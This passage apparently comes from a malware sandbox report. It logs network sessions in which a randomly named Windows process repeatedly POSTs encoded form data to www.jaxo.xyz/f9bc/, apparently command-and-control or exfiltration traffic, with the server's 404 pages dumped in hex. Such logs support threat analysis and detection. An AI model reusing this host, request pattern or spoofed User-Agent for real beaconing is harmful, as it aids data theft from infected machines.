                                        Accept-Language: en-US,en;q=0.5
                                        Connection: close
                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                                        Sep 3, 2024 13:54:37.271822929 CEST | 691 | IN | HTTP/1.1 404 Not Found
                                        Server: nginx
                                        Date: Tue, 03 Sep 2024 11:54:37 GMT
                                        Content-Type: text/html
                                        Content-Length: 548
                                        Connection: close
                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        17 | 192.168.2.4 | 49754 | 66.29.149.180 | 80 | 6016 | C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Sep 3, 2024 13:54:42.408958912 CEST | 731 | OUT | POST /f9bc/ HTTP/1.1
                                        Host: www.jaxo.xyz
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Language: en-US,en;q=0.5
                                        Accept-Encoding: gzip, deflate
                                        Origin: http://www.jaxo.xyz
                                        Referer: http://www.jaxo.xyz/f9bc/
                                        Cache-Control: max-age=0
                                        Connection: close
                                        Content-Length: 199
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                                        Data Raw: 72 38 3d 33 51 6a 6d 58 72 34 64 41 72 65 45 51 4b 51 57 34 33 4a 50 6a 74 63 65 6b 54 6c 65 6a 61 56 32 31 61 5a 38 68 46 7a 6f 33 41 73 74 6e 53 76 43 6f 43 32 41 72 79 65 55 45 77 78 70 2f 50 55 75 63 54 45 6c 4e 68 57 62 65 69 77 6c 31 2f 6f 56 79 4c 64 32 4a 35 2b 6e 7a 77 39 36 64 70 50 6e 47 64 76 58 54 36 35 42 51 30 6d 50 50 33 65 38 44 63 79 4b 70 6a 6f 32 44 46 37 79 52 4b 2b 56 48 46 4c 70 41 37 34 61 6d 66 67 59 35 50 34 38 78 42 7a 50 62 63 7a 49 4c 34 58 63 43 7a 74 56 72 46 67 46 64 48 33 57 53 48 46 4c 6d 66 5a 69 65 46 71 6e 59 77 69 67 30 51 58 37 37 69 70 54 7a 77 3d 3d
                                        Data Ascii: r8=3QjmXr4dAreEQKQW43JPjtcekTlejaV21aZ8hFzo3AstnSvCoC2AryeUEwxp/PUucTElNhWbeiwl1/oVyLd2J5+nzw96dpPnGdvXT65BQ0mPP3e8DcyKpjo2DF7yRK+VHFLpA74amfgY5P48xBzPbczIL4XcCztVrFgFdH3WSHFLmfZieFqnYwig0QX77ipTzw==
                                        Sep 3, 2024 13:54:43.011328936 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                        Date: Tue, 03 Sep 2024 11:54:42 GMT
                                        Server: Apache
                                        Content-Length: 13840
                                        Connection: close
                                        Content-Type: text/html
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 2e 66 75 6e 64 6f 7b 0a 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 63 61 6c 65 73 20 33 73 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 70 61 6f 2d 62 61 69 78 6f 7b 0a 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 72 6f 74 61 74 65 70 61 6f 20 31 34 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 31 2c 2e 34 39 2c 2e 34 31 2c 2e 39 37 29 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 70 61 6f 2d 63 69 6d 61 7b 0a 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 72 6f 74 61 74 65 70 61 6f 20 37 73 20 31 [TRUNCATED]
                                        Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <style>.fundo{ animation: scales 3s alternate infinite; transform-origin: center;}.pao-baixo{ animation: rotatepao 14s cubic-bezier(.1,.49,.41,.97) infinite; transform-origin: center;}.pao-cima{ animation: rotatepao 7s 1s cubic-bezier(.1,.49,.41,.97) infinite; transform-origin: center;}.olhos{animation: olhos 2s alternate infinite; transform-origin: center;}.left-sparks{animation: left-sparks 4s alternate infinite; transform-origin: 150px 156px;}.right-sparks{animation: left-sparks 4s alternate infinite; transform-origin: 310px 150px;}.olhos{animation: olhos 2s alternate infinite; transform-origin: center;}@keyframes scales{ from { transform: scale(0.98)} to{ transform: scale(1)}}@keyframes rotatepao{ 0% { transform: rotate(0deg)} 50% , 60%{ transform: rotate(-20deg)} 100%{ transform: rotate(0deg) } }@keyframes [TRUNCATED]
                                        Sep 3, 2024 13:54:43.011353016 CEST | 224 | IN | Data Raw: 28 33 30 64 65 67 29 3b 0a 20 20 7d 0a 7d 0a 0a 40 6b 65 79 66 72 61 6d 65 73 20 6c 65 66 74 2d 73 70 61 72 6b 73 7b 0a 20 20 30 25 7b 0a 20 20 20 20 6f 70 61 63 69 74 79 3a 20 30 3b 20 0a 20 20 7d 0a 20 20 0a 7d 0a 0a 0a 2e 6d 61 69 6e 7b 0a 20
                                        Data Ascii: (30deg); }}@keyframes left-sparks{ 0%{ opacity: 0; } }.main{ min-height: 600px; margin: 0px auto; width: auto; max-width: 460px; display: flex; align-items: center; justify-content: cente
                                        Sep 3, 2024 13:54:43.011368036 CEST | 1236 | IN | Data Raw: 72 3b 0a 7d 0a 0a 2e 70 61 74 68 20 7b 0a 20 20 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 20 33 30 30 3b 0a 20 20 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 20 33 30 30 3b 0a 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 64 61 73 68
                                        Data Ascii: r;}.path { stroke-dasharray: 300; stroke-dashoffset: 300; animation: dash 4s alternate infinite;}@keyframes dash{ 0%, 30%{ fill: 4B4B62; stroke-dashoffset: 0; } 80%,100%{ fill: transparent; stroke-dash
                                        Sep 3, 2024 13:54:43.011435986 CEST | 1236 | IN | Data Raw: 36 2e 37 31 35 2d 32 37 2e 36 38 33 2d 31 30 2e 36 34 35 2d 35 37 2e 38 34 34 20 31 38 2e 33 37 37 2d 38 36 2e 31 35 32 20 39 2e 38 37 33 2d 32 2e 31 30 31 2d 2e 36 33 2d 34 2e 33 31 32 2d 31 2e 36 30 35 2d 35 2e 34 31 38 2d 33 2e 36 34 31 2d 31
                                        Data Ascii: 6.715-27.683-10.645-57.844 18.377-86.152 9.873-2.101-.63-4.312-1.605-5.418-3.641-1.08-1.988-.834-4.51-.214-6.716 3.468-12.348 16.939-20.21 17.528-33.102.32-7.008-3.504-13.564-8.325-18.251-33.126-32.2-81.125 6.102-114.9 18.194-55.542 19.884-112
                                        Sep 3, 2024 13:54:43.011449099 CEST | 1236 | IN | Data Raw: 22 4d 33 34 2e 36 34 38 20 31 36 37 2e 37 35 38 63 2d 38 2e 38 36 33 2d 31 2e 35 32 36 2d 32 33 2e 35 31 35 2d 36 2e 39 33 39 2d 33 30 2e 32 39 32 2d 31 34 2e 32 31 38 2d 36 2e 37 37 35 2d 37 2e 32 38 2d 32 2e 30 39 36 2d 38 2e 38 30 33 20 33 2e
                                        Data Ascii: "M34.648 167.758c-8.863-1.526-23.515-6.939-30.292-14.218-6.775-7.28-2.096-8.803 3.508-5.387 5.605 3.415 24.569 11.557 54.124 12.263 29.555.706 61.424-6.946 72.2-17.053 0 0 2.705-1.47 2.768 1.509.062 2.98.428 7.948-2.769 10.507-3.196 2.558-34.8
                                        Sep 3, 2024 13:54:43.011461973 CEST | 672 | IN | Data Raw: 28 31 36 31 20 36 38 29 22 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 46 46 45 41 44 34 22 20 64 3d 22 4d 34 35 2e 35 30 38 20 31 33 2e 31 31 34 63 2d 2e 33 36 38 2e 35 34 39 2d 2e 35 34 20 31
                                        Data Ascii: (161 68)"/> <path fill="#FFEAD4" d="M45.508 13.114c-.368.549-.54 1.598-.503 2.445.017.392.297.604.45.287.143-.297.222-.617.303-.978.087-.387.197-.735.238-1.15.042-.44-.257-.95-.488-.604M42.092 9.016c-.694.13-1.446.61-1.774 1.09
                                        Sep 3, 2024 13:54:43.011506081 CEST | 1236 | IN | Data Raw: 33 2d 2e 36 32 33 4d 32 39 2e 37 39 33 20 39 2e 30 31 32 63 2d 2e 32 36 2d 2e 31 30 38 2d 2e 34 39 38 2e 35 33 32 2d 2e 36 32 2e 39 34 32 2d 2e 31 36 36 2e 35 36 35 2d 2e 32 30 35 20 31 2e 30 33 33 2d 2e 31 34 39 20 31 2e 36 37 34 2e 30 35 33 2e
                                        Data Ascii: 3-.623M29.793 9.012c-.26-.108-.498.532-.62.942-.166.565-.205 1.033-.149 1.674.053.59.424.405.493-.048-.002.014.102-.302.138-.4.093-.247.18-.497.262-.76.113-.359.144-1.297-.124-1.408M38.384 6.056c-.737-.211-1.406.211-1.881.674-.53.514-.607 1.19
                                        Sep 3, 2024 13:54:43.011518955 CEST | 1236 | IN | Data Raw: 20 31 2e 38 34 38 2e 35 30 33 2e 34 39 2e 30 36 39 20 31 2e 30 34 32 2d 2e 31 39 39 2e 38 33 35 2d 2e 34 32 4d 37 33 2e 39 35 36 20 31 30 2e 36 32 36 63 2d 2e 32 33 31 2d 2e 38 33 36 2d 2e 37 33 35 2d 31 2e 32 35 35 2d 31 2e 33 31 36 2d 31 2e 35
                                        Data Ascii: 1.848.503.49.069 1.042-.199.835-.42M73.956 10.626c-.231-.836-.735-1.255-1.316-1.507-.24-.104-.5-.147-.75-.1-.148.028-.273.063-.407.161-.032.022-.373.238-.223.161-.282.148-.382.791-.057.979.117.067.22.24.333.325.168.128.336.247.508.364.327.219
                                        Sep 3, 2024 13:54:43.011532068 CEST | 448 | IN | Data Raw: 30 32 31 2d 2e 30 38 39 20 31 2e 32 38 36 2d 2e 33 31 35 2e 30 39 32 2d 2e 30 37 38 2e 30 38 38 2d 2e 31 38 32 2d 2e 30 33 2d 2e 32 35 35 4d 35 32 2e 39 30 36 20 38 2e 32 39 31 63 2d 2e 31 39 31 2d 2e 32 34 2d 2e 34 30 32 2d 2e 32 30 34 2d 2e 36
                                        Data Ascii: 021-.089 1.286-.315.092-.078.088-.182-.03-.255M52.906 8.291c-.191-.24-.402-.204-.634-.28-.218-.073-.326.255-.245.491.117.34.438.509.697.497.26-.01.37-.472.182-.708M80.437 1.283c-.385-.22-.844-.327-1.272-.266-.497.071-.7.363-1.033.724-.356.388.
                                        Sep 3, 2024 13:54:43.011686087 CEST | 1236 | IN | Data Raw: 2d 2e 35 34 38 2d 2e 34 35 37 2d 2e 34 37 36 2d 2e 35 34 31 2e 30 35 2d 2e 30 37 33 2e 34 35 33 2d 2e 30 35 37 2e 38 37 37 2e 30 31 20 31 2e 33 33 31 2e 30 38 33 2e 35 34 38 2e 32 38 36 2e 38 37 34 2e 35 31 32 20 31 2e 31 37 2e 31 31 2e 31 34 34
                                        Data Ascii: -.548-.457-.476-.541.05-.073.453-.057.877.01 1.331.083.548.286.874.512 1.17.11.144.276.048.357-.132.097-.215.088-.476.028-.716M87.395 8c-.77.016-1.317.338-2.032.43-.505.065-.477.525.046.56.713.047 1.359-.082 2.053-.14.468-.04 1.35.253 1.516-.1
                                        Sep 3, 2024 13:54:43.016442060 CEST | 1236 | IN | Data Raw: 31 31 2e 32 38 36 2d 2e 33 37 2e 33 33 35 2d 2e 37 30 39 2e 30 34 2d 2e 32 37 36 2e 30 35 38 2d 2e 35 35 34 2e 30 37 2d 2e 38 33 36 2e 30 32 34 2d 2e 35 36 38 2d 2e 31 38 39 2d 31 2e 30 35 32 2d 2e 34 36 36 2d 31 2e 33 30 36 4d 31 30 38 2e 34 35
                                        Data Ascii: 11.286-.37.335-.709.04-.276.058-.554.07-.836.024-.568-.189-1.052-.466-1.306M108.458 14.127c-.434-.548-.995-.921-1.662-1.103-.746-.203-1.116.933-.445 1.28.216.11.4.251.557.443.204.248.42.648.672.84.348.262.868.645 1.249.23.437-.478-.064-1.305-.


                                        Session ID: 18 | Source IP: 192.168.2.4 | Source Port: 49755 | Destination IP: 66.29.149.180 | Destination Port: 80 | PID: 6016 | Process: C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Sep 3, 2024 13:54:44.961085081 CEST | 751 | OUT | POST /f9bc/ HTTP/1.1
                                        Host: www.jaxo.xyz
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Language: en-US,en;q=0.5
                                        Accept-Encoding: gzip, deflate
                                        Origin: http://www.jaxo.xyz
                                        Referer: http://www.jaxo.xyz/f9bc/
                                        Cache-Control: max-age=0
                                        Connection: close
                                        Content-Length: 219
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                                        Data Raw: 72 38 3d 33 51 6a 6d 58 72 34 64 41 72 65 45 57 62 67 57 37 52 42 50 79 64 63 5a 68 54 6c 65 70 36 56 79 31 61 56 38 68 41 44 34 77 79 49 74 69 48 54 43 36 58 57 41 6f 79 65 55 51 41 77 6a 77 76 56 69 63 54 34 63 4e 6b 75 62 65 6a 51 6c 31 37 73 56 7a 38 78 35 4a 70 2b 66 37 51 39 43 54 4a 50 6e 47 64 76 58 54 35 46 72 51 30 65 50 50 44 69 38 41 2b 57 4c 71 6a 6f 31 41 46 37 79 56 4b 2b 5a 48 46 4c 41 41 34 39 33 6d 64 59 59 35 4b 45 38 78 55 47 5a 56 63 7a 4f 50 34 57 76 53 53 63 4e 68 56 52 75 62 6b 71 7a 56 55 68 66 75 35 49 34 50 30 4c 77 4b 77 47 54 70 58 65 50 32 68 55 61 6f 77 47 61 67 75 73 56 4d 74 65 49 51 64 52 49 76 70 6c 77 34 76 67 3d
                                        Data Ascii: r8=3QjmXr4dAreEWbgW7RBPydcZhTlep6Vy1aV8hAD4wyItiHTC6XWAoyeUQAwjwvVicT4cNkubejQl17sVz8x5Jp+f7Q9CTJPnGdvXT5FrQ0ePPDi8A+WLqjo1AF7yVK+ZHFLAA493mdYY5KE8xUGZVczOP4WvSScNhVRubkqzVUhfu5I4P0LwKwGTpXeP2hUaowGagusVMteIQdRIvplw4vg=
                                        Sep 3, 2024 13:54:45.545619011 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                        Date: Tue, 03 Sep 2024 11:54:45 GMT
                                        Server: Apache
                                        Content-Length: 13840
                                        Connection: close
                                        Content-Type: text/html
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 2e 66 75 6e 64 6f 7b 0a 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 63 61 6c 65 73 20 33 73 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 70 61 6f 2d 62 61 69 78 6f 7b 0a 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 72 6f 74 61 74 65 70 61 6f 20 31 34 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 31 2c 2e 34 39 2c 2e 34 31 2c 2e 39 37 29 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 70 61 6f 2d 63 69 6d 61 7b 0a 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 72 6f 74 61 74 65 70 61 6f 20 37 73 20 31 [TRUNCATED]
                                        Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <style>.fundo{ animation: scales 3s alternate infinite; transform-origin: center;}.pao-baixo{ animation: rotatepao 14s cubic-bezier(.1,.49,.41,.97) infinite; transform-origin: center;}.pao-cima{ animation: rotatepao 7s 1s cubic-bezier(.1,.49,.41,.97) infinite; transform-origin: center;}.olhos{animation: olhos 2s alternate infinite; transform-origin: center;}.left-sparks{animation: left-sparks 4s alternate infinite; transform-origin: 150px 156px;}.right-sparks{animation: left-sparks 4s alternate infinite; transform-origin: 310px 150px;}.olhos{animation: olhos 2s alternate infinite; transform-origin: center;}@keyframes scales{ from { transform: scale(0.98)} to{ transform: scale(1)}}@keyframes rotatepao{ 0% { transform: rotate(0deg)} 50% , 60%{ transform: rotate(-20deg)} 100%{ transform: rotate(0deg) } }@keyframes [TRUNCATED]
                                        Sep 3, 2024 13:54:45.545634985 CEST | 224 | IN | Data Raw: 28 33 30 64 65 67 29 3b 0a 20 20 7d 0a 7d 0a 0a 40 6b 65 79 66 72 61 6d 65 73 20 6c 65 66 74 2d 73 70 61 72 6b 73 7b 0a 20 20 30 25 7b 0a 20 20 20 20 6f 70 61 63 69 74 79 3a 20 30 3b 20 0a 20 20 7d 0a 20 20 0a 7d 0a 0a 0a 2e 6d 61 69 6e 7b 0a 20
                                        Data Ascii: (30deg); }}@keyframes left-sparks{ 0%{ opacity: 0; } }.main{ min-height: 600px; margin: 0px auto; width: auto; max-width: 460px; display: flex; align-items: center; justify-content: cente
                                        Sep 3, 2024 13:54:45.545646906 CEST | 1236 | IN | Data Raw: 72 3b 0a 7d 0a 0a 2e 70 61 74 68 20 7b 0a 20 20 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 20 33 30 30 3b 0a 20 20 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 20 33 30 30 3b 0a 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 64 61 73 68
                                        Data Ascii: r;}.path { stroke-dasharray: 300; stroke-dashoffset: 300; animation: dash 4s alternate infinite;}@keyframes dash{ 0%, 30%{ fill: 4B4B62; stroke-dashoffset: 0; } 80%,100%{ fill: transparent; stroke-dash
                                        Sep 3, 2024 13:54:45.545666933 CEST | 1236 | IN | Data Raw: 36 2e 37 31 35 2d 32 37 2e 36 38 33 2d 31 30 2e 36 34 35 2d 35 37 2e 38 34 34 20 31 38 2e 33 37 37 2d 38 36 2e 31 35 32 20 39 2e 38 37 33 2d 32 2e 31 30 31 2d 2e 36 33 2d 34 2e 33 31 32 2d 31 2e 36 30 35 2d 35 2e 34 31 38 2d 33 2e 36 34 31 2d 31
                                        Data Ascii: 6.715-27.683-10.645-57.844 18.377-86.152 9.873-2.101-.63-4.312-1.605-5.418-3.641-1.08-1.988-.834-4.51-.214-6.716 3.468-12.348 16.939-20.21 17.528-33.102.32-7.008-3.504-13.564-8.325-18.251-33.126-32.2-81.125 6.102-114.9 18.194-55.542 19.884-112
                                        Sep 3, 2024 13:54:45.545677900 CEST | 448 | IN | Data Raw: 22 4d 33 34 2e 36 34 38 20 31 36 37 2e 37 35 38 63 2d 38 2e 38 36 33 2d 31 2e 35 32 36 2d 32 33 2e 35 31 35 2d 36 2e 39 33 39 2d 33 30 2e 32 39 32 2d 31 34 2e 32 31 38 2d 36 2e 37 37 35 2d 37 2e 32 38 2d 32 2e 30 39 36 2d 38 2e 38 30 33 20 33 2e
                                        Data Ascii: "M34.648 167.758c-8.863-1.526-23.515-6.939-30.292-14.218-6.775-7.28-2.096-8.803 3.508-5.387 5.605 3.415 24.569 11.557 54.124 12.263 29.555.706 61.424-6.946 72.2-17.053 0 0 2.705-1.47 2.768 1.509.062 2.98.428 7.948-2.769 10.507-3.196 2.558-34.8
                                        Sep 3, 2024 13:54:45.545691967 CEST | 1236 | IN | Data Raw: 38 31 20 35 32 2e 35 34 33 2d 35 2e 33 33 33 20 31 35 2e 30 36 2d 34 2e 38 35 32 20 31 36 2e 32 32 33 2d 39 2e 35 35 20 31 37 2e 39 39 38 2d 31 33 2e 32 39 38 20 31 2e 37 37 34 2d 33 2e 37 34 38 2d 31 30 37 2e 33 32 2d 37 2e 38 30 39 2d 31 32 34
                                        Data Ascii: 81 52.543-5.333 15.06-4.852 16.223-9.55 17.998-13.298 1.774-3.748-107.32-7.809-124.3-3.524" transform="translate(161 68)"/> </g> <g class="pao-cima"> <path fill="#FBB868" d="M71.37 0C49.008.035-2.4
                                        Sep 3, 2024 13:54:45.545701027 CEST | 224 | IN | Data Raw: 38 37 2e 30 30 37 20 31 2e 34 38 35 2e 32 35 20 32 2e 30 36 37 2e 31 39 2e 34 35 38 2e 36 39 34 2e 34 37 33 2e 37 33 37 2d 2e 32 35 2e 30 34 33 2d 2e 37 35 39 2d 2e 31 30 39 2d 31 2e 35 39 32 2d 2e 33 37 32 2d 32 2e 31 38 31 4d 33 32 2e 35 35 20
                                        Data Ascii: 87.007 1.485.25 2.067.19.458.694.473.737-.25.043-.759-.109-1.592-.372-2.181M32.55 15.101c-1.206.547-1.849 1.662-1.414 2.552.188.384 1.21.504 1.46.077.188-.32.407-.629.616-.942.243-.363.63-.675.767-1.064.173-.486-.753-.93-1.4
                                        Sep 3, 2024 13:54:45.545712948 CEST | 1236 | IN | Data Raw: 33 2d 2e 36 32 33 4d 32 39 2e 37 39 33 20 39 2e 30 31 32 63 2d 2e 32 36 2d 2e 31 30 38 2d 2e 34 39 38 2e 35 33 32 2d 2e 36 32 2e 39 34 32 2d 2e 31 36 36 2e 35 36 35 2d 2e 32 30 35 20 31 2e 30 33 33 2d 2e 31 34 39 20 31 2e 36 37 34 2e 30 35 33 2e
                                        Data Ascii: 3-.623M29.793 9.012c-.26-.108-.498.532-.62.942-.166.565-.205 1.033-.149 1.674.053.59.424.405.493-.048-.002.014.102-.302.138-.4.093-.247.18-.497.262-.76.113-.359.144-1.297-.124-1.408M38.384 6.056c-.737-.211-1.406.211-1.881.674-.53.514-.607 1.19
                                        Sep 3, 2024 13:54:45.545727968 CEST | 224 | IN | Data Raw: 20 31 2e 38 34 38 2e 35 30 33 2e 34 39 2e 30 36 39 20 31 2e 30 34 32 2d 2e 31 39 39 2e 38 33 35 2d 2e 34 32 4d 37 33 2e 39 35 36 20 31 30 2e 36 32 36 63 2d 2e 32 33 31 2d 2e 38 33 36 2d 2e 37 33 35 2d 31 2e 32 35 35 2d 31 2e 33 31 36 2d 31 2e 35
                                        Data Ascii: 1.848.503.49.069 1.042-.199.835-.42M73.956 10.626c-.231-.836-.735-1.255-1.316-1.507-.24-.104-.5-.147-.75-.1-.148.028-.273.063-.407.161-.032.022-.373.238-.223.161-.282.148-.382.791-.057.979.117.067.22.24.333.325.168.128.336.
                                        Sep 3, 2024 13:54:45.545737982 CEST | 1236 | IN | Data Raw: 32 34 37 2e 35 30 38 2e 33 36 34 2e 33 32 37 2e 32 31 39 2e 35 36 34 2e 36 30 39 2e 38 37 33 2e 38 36 38 2e 35 33 37 2e 34 35 20 31 2e 32 37 2d 2e 34 32 20 31 2e 30 34 2d 31 2e 32 35 31 4d 36 36 2e 35 34 39 20 31 35 2e 30 31 37 63 2d 2e 38 33 2d
                                        Data Ascii: 247.508.364.327.219.564.609.873.868.537.45 1.27-.42 1.04-1.251M66.549 15.017c-.83-.233-.486 2.056-.435 2.528.055.51.678.664.741.08.068-.628.42-2.405-.306-2.608M54.803 16.301c-.065-.347-.1-.709-.19-1.038-.107-.393-.44-.32-.532.052-.186.746-.052
                                        Sep 3, 2024 13:54:45.551246881 CEST | 1236 | IN | Data Raw: 31 2e 30 33 33 2e 37 32 34 2d 2e 33 35 36 2e 33 38 38 2e 30 37 20 31 2e 31 34 33 2e 35 34 2e 39 33 6c 2d 2e 30 36 35 2d 2e 30 38 33 63 2e 30 39 35 2e 30 35 2e 31 39 32 2e 30 38 2e 32 39 35 2e 30 39 2e 31 37 37 2e 30 33 32 2e 33 31 2e 30 37 34 2e
                                        Data Ascii: 1.033.724-.356.388.07 1.143.54.93l-.065-.083c.095.05.192.08.295.09.177.032.31.074.477.16.373.189.702.503 1.023.78.348.301 1.738.788 1.586-.245-.141-.963-.789-1.652-1.551-2.09M78.955 8.082c-.134-.55-.259-1.126-.366-1.703-.102-.548-.457-.476-.54


                                        Session ID: 19 | Source IP: 192.168.2.4 | Source Port: 49756 | Destination IP: 66.29.149.180 | Destination Port: 80 | PID: 6016 | Process: C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Sep 3, 2024 13:54:47.505000114 CEST | 10833 | OUT | POST /f9bc/ HTTP/1.1
                                        Host: www.jaxo.xyz
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Language: en-US,en;q=0.5
                                        Accept-Encoding: gzip, deflate
                                        Origin: http://www.jaxo.xyz
                                        Referer: http://www.jaxo.xyz/f9bc/
                                        Cache-Control: max-age=0
                                        Connection: close
                                        Content-Length: 10299
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
